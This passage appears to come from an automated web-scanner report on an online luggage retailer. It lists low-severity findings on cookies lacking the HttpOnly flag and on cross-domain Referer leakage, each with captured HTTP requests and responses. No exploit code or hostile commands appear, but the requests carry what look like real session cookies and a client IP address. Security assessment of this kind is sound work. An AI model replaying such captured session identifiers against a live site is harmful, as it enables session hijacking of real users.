User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.52. http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:59 GMT; path=/
ACCT=guest; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617?productid=1283460 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/category/travel-accessories/20014443?ne=100
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373836|PC#1293371743230-938821.20#1294581576|check#true#1293372036; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371974968}; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1150; fsr.a=1293371979601; s_sq=ebagsprod%3D%2526pid%253DCategory%252520%25253A%252520Sale%252520%25253A%252520Travel%252520Accessories%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fproduct%25252Fbaggallini%25252Fa-la-carte-bagg-medium-crinkle-nylon%25252F107617%25253Fproductid%25253D128346%2526ot%253DA

Response

3.53. http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:25 GMT; path=/
ACCT=guest; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/category/carry-on-luggage/20048891
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373793|PC#1293371743230-938821.20#1294581533|check#true#1293371993; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1169; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":3,"to":4.2,"c":"http://www.ebags.com/category/carry-on-luggage/20048891","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1293371932378}; s_sq=ebagsprod%3D%2526pid%253DCategory%252520%25253A%252520Bags%252520by%252520eBags%252520%25253A%252520Carry-On%252520Luggage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fproduct%25252Febags%25252Fmother-lode-tls-mini-21-wheeled-duffel%25252F125538%25253Fproductid%25253D1325214%2526ot%253DA

Response

3.54. http://www.ebags.com/products/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:16:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: /index.cfm
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1662

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.cfm">here</a>.</h2>
</body></html>
<!-- SiteCatalyst code version: H.10. Copyright 1997-2007 Omniture, Inc
...[SNIP]...

3.55. http://www.ebags.com/products/view/ZoomColorsViews.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/view/ZoomColorsViews.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/view/ZoomColorsViews.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 503 Page Temporarily Unavailable.
Connection: close
Date: Sun, 26 Dec 2010 14:16:09 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:09 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C
...[SNIP]...

3.56. http://www.ebags.com/rewards/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/rewards/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rewards/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.57. http://www.ebags.com/shoppingcart/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:38 GMT; path=/
ACCT=guest; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; mbox=session#1293371743230-938821#1293373808|PC#1293371743230-938821.20#1294581548|check#true#1293372008; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1180; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":4,"to":4.8,"c":"http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1293371947239}; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; s_sq=%5B%5BB%5D%5D

Response

3.58. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/car_travel_accessories/category_search/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel_accessories/car_travel_accessories/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.59. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel_accessories/travel_electronics_cases/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

4. Cross-domain Referer leakage previous next
There are 20 instances of this issue:

/blocks/ajax/certonaajax.cfm
/blocks/ajax/persistentCart.cfm
/brands/index.cfm
/category/travel-accessories/20014443
/help/index.cfm
/help/index.cfm
/info/Compare/index.cfm
/info/index.cfm
/info/index.cfm
/info/index.cfm
/members/index.cfm
/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617
/product/case-logic/sony-psp-game-case/120830
/product/case-logic/sony-psp-game-case/120830
/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538
/products/view/ZoomColorsViews.cfm
/rewards/index.cfm
/shoppingcart/index.cfm
/shoppingcart/index.cfm
/shoppingcart/index.cfm

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

4.1. http://www.ebags.com/blocks/ajax/certonaajax.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/ajax/certonaajax.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/blocks/ajax/certonaajax.cfm?_=1293371995145

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/143101_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/107842_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/13032_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125548_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115

Request

GET /blocks/ajax/certonaajax.cfm?_=1293371995145 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a59%3a59+AM&requesttimeout=9000&itemAdded=true
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373852|PC#1293371743230-938821.20#1294581592|check#true#1293372052; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371974968}; s_cc=true; s_sq=%5B%5BB%5D%5D; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1172; fsr.a=1293371994671

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 26 Dec 2010 14:00:15 GMT
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:00:15 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 4146

<!--
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
</titl
...[SNIP]...
href="/product/ebags/mother-lode-tls-junior-25-wheeled-duffel/125548?productid=1325229&rlid=cart&rcode=res10122606500133309746223" title="eBags Mother Lode TLS Junior 25" Wheeled Duffel Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125548_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode TLS Junior 25" Wheeled Duffel Luggage"></a>
...[SNIP]...
<a href="/product/ebags/packing-cubes-3pc-set/13032?productid=65823&rlid=cart&rcode=res10122606500133309746223" title="eBags Packing Cubes - 3pc Set Travel Accessories">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/13032_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Packing Cubes - 3pc Set Travel Accessories"></a>
...[SNIP]...
<a href="/product/ebags/slim-packing-cubes-3pc-set/107842?productid=1283923&rlid=cart&rcode=res10122606500133309746223" title="eBags Slim Packing Cubes - 3pc Set Travel Accessories">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/107842_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Slim Packing Cubes - 3pc Set Travel Accessories"></a>
...[SNIP]...
<a href="/product/ebags/mother-lode-tls-weekender-convertible/143101?productid=1370034&rlid=cart&rcode=res10122606500133309746223" title="eBags Mother Lode TLS Weekender Convertible Backpacks">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/143101_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode TLS Weekender Convertible Backpacks"></a>
...[SNIP]...

4.2. http://www.ebags.com/blocks/ajax/persistentCart.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/ajax/persistentCart.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/blocks/ajax/persistentCart.cfm?itemAdded=true

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/hdr_carticon.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/hdr_closecart.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_begincheckout.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_continueshopping.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_vieworeditmycart.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_footer.png

Request

POST /blocks/ajax/persistentCart.cfm?itemAdded=true HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214
Origin: http://www.ebags.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; mbox=session#1293371743230-938821#1293373808|PC#1293371743230-938821.20#1294581548|check#true#1293372008; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1180; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":4,"to":4.8,"c":"http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1293371947239}; s_sq=ebagsprod%3D%2526pid%253DProduct%252520Details%252520%25253A%252520125538%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fa1512.g.akamaitech.net%25252Ff%25252F1512%25252F124%25252F1h%25252Fimages.ebags.com%25252Fimg%25252FProductDetail%25252Fadd-to-cart.gif%2526ot%253DIMAGE
Content-Length: 69

cartAction=additem&RequireCookie=YES&modelID=125538&ProductID=1325214

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 26 Dec 2010 13:59:34 GMT
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:34 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 3701

<div id="pcartcontainer">
<div class="pcartleftalign"><a href="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000" data-linkName="hcart-header_icon"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/hdr_carticon.png" border="0" /></a>
...[SNIP]...
<div class="pcartleftalign"><img class="closeCartLink" src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/hdr_closecart.png" border="0" data-linkName="hcart-close" /></div>
...[SNIP]...
